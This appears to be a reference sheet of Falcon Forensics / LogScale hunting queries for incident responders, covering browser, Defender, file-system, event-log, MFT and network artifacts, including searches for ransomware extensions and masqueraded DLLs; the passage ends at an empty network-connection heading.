#event_simpleName=BamRegAppRunTime ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, RegKeyName, AppName, FfcFileIdentifier, UserSecurityDomain, UserSid, UserName], limit=max)

Browser

Show all Fields for BrowserCookieInfo

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Show cookies from a specific site

#event_simpleName = BrowserCookieInfo ForensicsCollectionIdentifier = * | BrowserCookieLastAccessed := parseTimestamp(field="BrowserCookieLastAccessed", format=seconds) | BrowserCookieLastAccessed := formatTime(format="%F %T", field="BrowserCookieLastAccessed") | BrowserCookieExpiration := parseTimestamp(field="BrowserCookieExpiration", format=seconds) | BrowserCookieExpiration := formatTime(format="%F %T", field="BrowserCookieExpiration") | BrowserCookieHost = <site of interest> | table([BrowserCookieLastAccessed, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserCookieHost, BrowserCookiePath, BrowserCookieExpiration, BrowserCookieIsHttpOnly, BrowserCookieIsSecure, SourceFileName, UserName], limit=max)

Note: Replace with site name. You can use wildcards such as "*google.com".

Show all Fields for BrowserExtensionInfo

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, InstallDate, BrowserExtensionVersion, UpdateSupportUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show BrowserExtensionInfo with Matching Browser

#event_simpleName = BrowserExtensionInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | BrowserName = BROWSERNAME | table([time, aid, cid, ForensicsCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserExtensionId, BrowserExtensionName, InstallDate, BrowserExtensionVersion, UpdateSupportUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Replace BROWSERNAME with browser name such as Edge, Firefox, Chrome.

Show all fields for BrowserHistoryVisit

#event_simpleName=BrowserHistoryVisit | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Title, BrowserVisitCount, BrowserUrlTypedCount, BrowserVisitType, Id, BrowserRedirectSourceTableEntry, BrowserRedirectDesitnationTableEntry, BrowserVisitTableId, SourceAccountDomain, UrlLastModifiedTimeStamp], limit=max)

Note: ContextTimeStamp (time) is collection time.

Show all fields for BrowserDownloadStarted

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show abnormally large files

#event_simpleName=BrowserDownloadStarted | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | Size > <fill in bytes here> | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, BrowserDownloadLastAccessed, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Change with the number of bytes you're looking for.

Show all fields for BrowserDownloadEnded

#event_simpleName=BrowserDownloadEnded | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | table([time, aid, ForensicsCollectionIdentifier, UserName, BrowserName, BrowserArtifactType, Url, Size, TargetFileName, SourceFileName, BrowserDownloadLastAccessed, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, MimeType, BrowserDownloadFileState, BrowserDownloadFileOpened, BrowserDownloadSiteUrl, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain], limit=max)

Show downloaded files from a specific site

#event_simpleName=BrowserDownloadEnded | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | BrowserDownloadSiteUrl = * | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, BrowserDownloadLastAccessed, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Show abnormally large files

#event_simpleName=BrowserDownloadEnded | ContextTimeStamp := parseTimestamp(field="ContextTimeStamp", format=seconds) | time := formatTime(format="%F %T", field="ContextTimeStamp") | Size > <fill in bytes here> | table([time, aid, cid, ForensiceCollectionIdentifier, BrowserName, BrowserArtifactType, BrowserDownloadFileState, BrowserDownloadLastAccessed, Id, TargetFileName, Size, BrowserDownloadFileDangerType, BrowserDownloadFileInterruptReason, BrowserDownloadSiteUrl, BrowserDownloadFileOpened, BrowserTabDownLoadLinkUrl, BrowserTabDownLoadOriginalReferrerUrl, ReferrerUrl, SourceAccountDomain, SourceFileName, UserName], limit=max)

Note: Change with the number of bytes you're looking for.

DataStore

Show all fields for OsUpdateTimestamp

#event_simpleName=OsUpdateTimestamp ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UpdateGuid, UpdateClassificationGuid, UpdateServerGuid, UpdateClientId, UpdateServerSelection, UpdateStatus, Description, UpdateTitle, UpdateCategory, UpdateMoreInfoUrl, UpdateSupportUrl], limit=max)

Defender

Show all fields for MpThreat

#event_simpleName=MpThreat ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | MpThreatTrackingStartTime := parseTimeStamp(field=MpThreatTrackingStartTime, format=seconds) | MpThreatTrackingStartTime := formatTime("%F %T", field=MpThreatTrackingStartTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MpThreatTrackingId, MpThreatTrackingStartTime, MpThreatTrackingSize, MpThreatTrackingSha1, MpThreatTrackingMD5, MpThreatTrackingSha256, MpThreatTrackingScanType, MpThreatTrackingScanFlags, MpThreatTrackingScanSource, MpThreatID, MpThreatName, MpThreatTrackingSigSeq, MpThreatTrackingSigSha, MpThreatTrackingIsEsuSig], limit=max)

Show all fields for MpThreatDetection

#event_simpleName=MpThreatDetection ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | MpInitialDetectionTime := parseTimeStamp(field=MpInitialDetectionTime, format=seconds) | MpInitialDetectionTime := formatTime("%F %T", field=MpInitialDetectionTime) | MpLastThreatStatusChangeTime := parseTimeStamp(field=MpLastThreatStatusChangeTime, format=seconds) | MpLastThreatStatusChangeTime := formatTime("%F %T", field=MpLastThreatStatusChangeTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MpMagicVersion, MpResource, MpResourceType, MpCategoryID, MpDetectionID, MpDomainUser1, MpDomainUser2, MpInitialDetectionTime, MpLastThreatStatusChangeTime, MpSeverityID, MpThreatID, MpThreatName, MpThreatStatusID, MpThreatStatusErrorCode], limit=max)

Show all fields for MpThreatWMI

#event_simpleName=MpThreatWMI ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ContextTimeStamp, TargetFileName, DidThreatExecute, IsActive, FfcFileIdentifier, MpCategoryID, MpThreatResources, MpThreatRollupStatus, SchemaVersion, MpSeverityID, MpThreatID, MpThreatName, MpThreatTypeID], limit=max)

Show all fields for MpThreatDetectionWMI

#event_simpleName=MpThreatDetectionWMI ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | MpLastThreatStatusChangeTime := parseTimeStamp(field=MpLastThreatStatusChangeTime, format=seconds) | MpLastThreatStatusChangeTime := formatTime("%F %T", field=MpLastThreatStatusChangeTime) | table([time, aid, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, ActionSuccess, AdditionalRemediationActionsBitMask, CurrentThreatExecutionStatusID, MpDetectionID, MpDetectionSourceTypeID, MpDomainUser1, MpInitialDetectionTime, MpLastThreatStatusChangeTime, MpRemediationTime, MpThreatCleaningActionID, MpThreatID, MpThreatResources, MpThreatStatusErrorCode, MpThreatStatusID, ProductVersion, TargetProcessName], limit=max)

Dirlist

Show All Fields for FileInfo

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, Size, UserName, MD5HashData, SHA1HashData, SHA256HashData, FileHeader, FileAttributes, UserSecurityDomain, TargetFileExtension, CompanyName, ImageInternalName, FileOwnerSid, UserSid, FileDescription, FileVersion, FileLegalCopyRight, CertificateExists, OriginalFileName, ProductName, ProductVersion], limit=max)

Find hidden files

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | FileAttributes=*FILE_ATTRIBUTE_HIDDEN* | table([time, ForensicsCollectionIdentifier, FfcFileIdentifier, FileName, TargetFileName, FileAttributes, SHA256HashData, UserName], limit=max)

Find less common extensions

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | NOT TargetFileName= *.jar NOT TargetFileName=*.sys NOT TargetFileName=zip NOT TargetFileName=*.exe NOT TargetFileName=*.dll NOT TargetFileName=*.ocx NOT TargetFileName=*.cpl | table([ForensicsCollectionIdentifier, FfcFileIdentifier, TargetFileName, UserName], limit=max)

Known threat actor tactic is to name dll files as "d1l" instead - quick win search for potentially bad dll files in environment

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | FileName= *.d1l OR FileName= *.dl1 | table([ForensicsCollectionIdentifier, FfcFileIdentifier, FileName, TargetFileName, UserName], limit=max)

Find Filenames with less than 6 characters checking for files that go under the radar with extensions bat, cmd, ps1, vbs, and vbe

#event_simpleName=FileInfo ForensicsCollectionIdentifier = * | FileName=*.bat OR FileName=*.cmd OR FileName=*.ps1 OR FileName=*.vbs OR FileName=*.vbe | length("FileName") | _length < 6 | table([ForensicsCollectionIdentifier, FfcFileIdentifier, FileName, TargetFileName, UserName], limit=max)

Show All Fields for FileTimestampMetadata

#event_simpleName=FileTimestampMetadata ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileChangeType, FileAttributes, FfcFileIdentifier], limit=max)

Show All Fields for SignInfo

#event_simpleName=SignInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, FfcFileIdentifier, MD5HashData, SHA1HashData, SHA256HashData, SignInfoFlags, SignerInfoCount, SignerInfo1, SignerInfo2, SignerInfo3, SignerInfo4, CertificateType, CertificateComment, CertificateSigner, CertificateVerified, CertificateCheckResult], limit=max)

Drives

Show all fields for FsVolumeMounted

#event_simpleName=FsVolumeMounted ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, Flags, VolumeIsNetwork, VolumeMountPoint, VolumeDriveLetter, VolumeFileSystemFlagString, VolumeOptions, VolumeAppearanceTime, VolumeBusName, VolumeBusPath, VolumeDeviceInternal, VolumeDeviceModel, VolumeDevicePath, VolumeDeviceProtocol, VolumeDeviceRevision, VolumeDeviceVendor, VolumeMediaBSDMajor, VolumeMediaBSDMinor, VolumeMediaBSDName, VolumeMediaBSDUnit, VolumeMediaContent, VolumeMediaEjectable, VolumeMediaName, VolumeMediaPath, VolumeMediaRemovable, VolumeMediaSize, VolumeMediaSizeString, VolumeMediaUUID, VolumeMediaWhole, VolumeMediaWritable, VolumeName, VolumeType, VolumeUUID, VolumeSectorSize, VolumeFreeBytes, VolumeFreeBytesString, FileNameMaxLength, FfcVolumeDeviceType, VolumeRealDeviceName, VolumeSerialNumber], limit=max)

Drivers

Show all fields for DriverLoad events

#event_simpleName=DriverLoad ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TargetFileName, ImageFileName, ImageBaseAddress], limit=max)

Env

Show all fields for RuntimeEnvironmentVariable

#event_simpleName=RuntimeEnvironmentVariable ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, EnvironmentVariableName, EnvironmentVariableValue], limit=max)

Events

Show all fields for LogEntry

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ForensicsText, FfcStructuredLogEntry, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber], limit=max)

Show only login events

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogEventId=528 OR FfcLogEventId=4624 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber, FfcStructuredLogEntry, ForensicsText], limit=max)

Show Service Control Manager Events

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | FfcLogName=System FfcLogOrigin = "Service Control Manager" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber, FfcStructuredLogEntry, ForensicsText], limit=max)

Show Audit Logs Cleared

#event_simpleName=LogEntry ForensicsCollectionIdentifier=* | (FfcLogOrigin="Microsoft-Windows-Eventlog" FfcLogEventId=1102) OR (FfcLogOrigin=Security FfcLogEventId=517) | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FfcLogSourceType, FfcLogOrigin, FfcLogConfidenceInterval, ComputerName, FfcLogName, FfcLogEventId, FfcWindowsLogEventCategory, FfcWindowsLogEventType, FfcLogFilterTag, FfcLogKeyword, FfcLogRecordNumber, FfcStructuredLogEntry, ForensicsText], limit=max)

Firewall

Show all fields for FirewallRuleInfo

 #event_simpleName=FirewallRuleInfo 
 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) 
 | time := formatTime("%F %T", field=ContextTimeStamp) 
 | table([time, ForensicsCollectionIdentifier, FirewallRuleName,
 Description, FirewallRuleEnabled, RuleAction, FirewallRuleGrouping,
 FirewallRuleIcmpTypeCode, ImageFileName, ServiceDisplayName, ConnectionDirection,
 FirewallRuleEdgeTraversal, FirewallRuleInterfaces, FirewallRuleInterfaceTypes,
 LocalAddressString, LocalPorts, NetworkProfile, Protocol, RemoteAddressString,
 RemotePorts], limit=max)

Files

Show all fields for FilesStatisticInfo

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Show Created, Modified, Accessed file statistics

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_CREATED" OR FilesStatisticType = "RAW_MODIFIED" OR FilesStatisticType = "RAW_ACCESSED" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max) | sort(field=FilesStatisticType, limit=max)

Show fields where stat is extensions

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_EXTENSIONS" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Show fields where stat is sizes

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_SIZES" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Show high number of ransomware file extension

#event_simpleName=FilesStatisticInfo ForensicsCollectionIdentifier = * | FilesStatisticType = "RAW_EXTENSIONS" | (FilesStatisticName=".locky" OR FilesStatisticName=".crypt" OR FilesStatisticName=".locked" OR FilesStatisticName=".dharma" OR FilesStatisticName=".zzzzzz") | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, FilesStatisticPath, FilesStatisticName, FilesStatisticType, FilesStatisticCount, FilesStatisticPercentageOfType], limit=max)

Groups

Show all fields for LocalGroupIdentity

#event_simpleName=LocalGroupIdentity ForensicsCollectionIdentifier = * | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, UserGroupName, GID, GroupMemberUIDs, UserName, UserSid], limit=max)

Handles

Show all fields for ProcessHandleTableEntry

#event_simpleName=ProcessHandleTableEntry ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, ForensicsCollectionIdentifier, ProcessHandleID, TargetProcessId, TargetProcessName, ProcessHandleType, ProcessHandleName], limit=max)

Jobs

Show all fields for AtJobInfo

#event_simpleName=AtJobInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, CommandLine, AtJobId, AtJobTime, AtJobDaysOfMonth, AtJobDaysOfWeek, AtJobProperties], limit=max)

Jumplist

Show all fields for JumpListInfo

#event_simpleName=JumpListInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, JumpListFileName, TargetFileName, TargetFileIdentifier, FfcFileIdentifier, JumpListApplicationId, JumpListApplication, JumpListType, CommandLineParameters, CommonNetworkRelativeLink, CommonPathSuffix, Description, DescriptionLocation, LinkTargetEmbedSize, HotKey, IconFile, IconIndex, ShowWindowFlags, VolumeName, CommandWorkingDirectory, AutoAccessCount, AutoEntryId, AutoBirthDroidFileId, AutoBirthDroidMacAddress, AutoBirthDroidTime, AutoDroidFileId, AutoDroidMacAddress, AutoDroidTime, AutoInteractionCount, AutoLastModificationTime, AutoNetBiosName, AutoPinned, AutoBirthDroidVolumeId, AutoDroidVolumeId, CustomCategoryIdentifier, CustomCategoryName, CustomCategoryType, CustomVersion], limit=max)

Link

Show all fields for LinkFileInfo

#event_simpleName=LinkFileInfo ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, LinkName, TargetFileName, TargetFileIdentifier, FfcFileIdentifier, LinkTargetEmbedSize, CommandLineParameters, CommandWorkingDirectory, Description, DescriptionLocation, Hotkey, IconFile, IconIndex, ShowWindowFlags], limit=max)

Magic

Show all fields for FileSignatureMismatch

#event_simpleName=FileSignatureMismatch ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TotalCount, FileExtension, FileHeader, TargetFileName,FfcFileIdentifier,LooksLikeExtensions], limit=max)

Show all fields for FileSignatureStatistics

#event_simpleName=FileSignatureStatistics ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TotalCount, FileHeader, FileExtension, LooksLikeExtensions], limit=max)

Show files that look like executable

#event_simpleName=FileSignatureStatistics ForensicsCollectionIdentifier=* | LooksLikeExtensions= "exe,dll,com,cpl,drv,fon,mui,ocx,scr,sys,tlb" | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, TotalCount, FileHeader, FileExtension, LooksLikeExtensions], limit=max)

Mal

Show All Fields for MalPaths

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show DLLINPATH MalType

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType=DLLINPATH | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show DLLSVCHOST MalType

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType = DLLSVCHOST | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show STICKYKEY MalType

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType=STICKYKEY | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

Show integrity vulnerable STICKYKEY

#event_simpleName=MalPaths ForensicsCollectionIdentifier=* MalType=STICKYKEY IntegrityVulnerable=1 | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, AppName, TargetFileName, FfcFileIdentifier, SHA256HashData, ContextImageFileName, ContextFileIdentifier, ContextSHA256HashData, IntegrityVulnerable, DebuggerVulnerable, MalType, CommandLine, TargetProcessId, TargetProcessName, ServiceDisplayNameRegistry, ServiceDisplayName], limit=max)

MFT

Show all fields for MftBootSector

#event_simpleName=MftBootSector ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, NtfsSectorsPerCluster, NtfsSectorsPerTrack, NtfsVolumeTotalSectors, NtfsVolumeSerialNumer, NtfsClustersPerIndexBlock, MftFileRecordSize, MftIndexRecordSize, MftClusterBlockNumber, MftClusterMirrorBlockNumber], limit=max)

Show all Fields for MftRecord

#event_simpleName=MftRecord ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, ForensicsCollectionIdentifier, MftRecordId, MftSectorAddress, TargetFileName, MftFileInUse, MftFileAttributesFn, MftFileAttributesSi, FileIsDirectory, MftFileSize, MftValidFileSize], limit=max)

Network

Network module is a lengthy section so it will be split into IPv4, IPv6, and DNS sections for ease of use

IPv4

Show all fields for LocalIpAddressIP4

#event_simpleName=LocalIpAddressIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, AddressFamily, InterfaceAlias, IfType, InterfaceDescription, InterfaceIdentifier, InterfaceIndex, LocalAddressIP4, NetLuidIndex, NetworkInterfaceGuid, PhysicalAddress, PermanentPhysicalAddress, PhysicalAddressLength, aid, cid, ForensicsCollectionIdentifier, #event_simpleName, name], limit=max)

Show all fields for NetworkListenIP4

#event_simpleName=NetworkListenIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkReceiveAcceptIP4

#event_simpleName=NetworkReceiveAcceptIP4 ForensicsCollectionIdentifier=* | ContextTimeStamp := parseTimeStamp(field=ContextTimeStamp, format=seconds) | time := formatTime("%F %T", field=ContextTimeStamp) | table([time, aid, cid, ForensicsCollectionIdentifier, RawProcessId, RemoteAddressIP4, RemotePort, LocalAddressIP4, LocalPort, ConnectionDirection, ConnectionFlags, Protocol, InContext, FfcNetworkState], limit=max)

Show all fields for NetworkConnectIP4

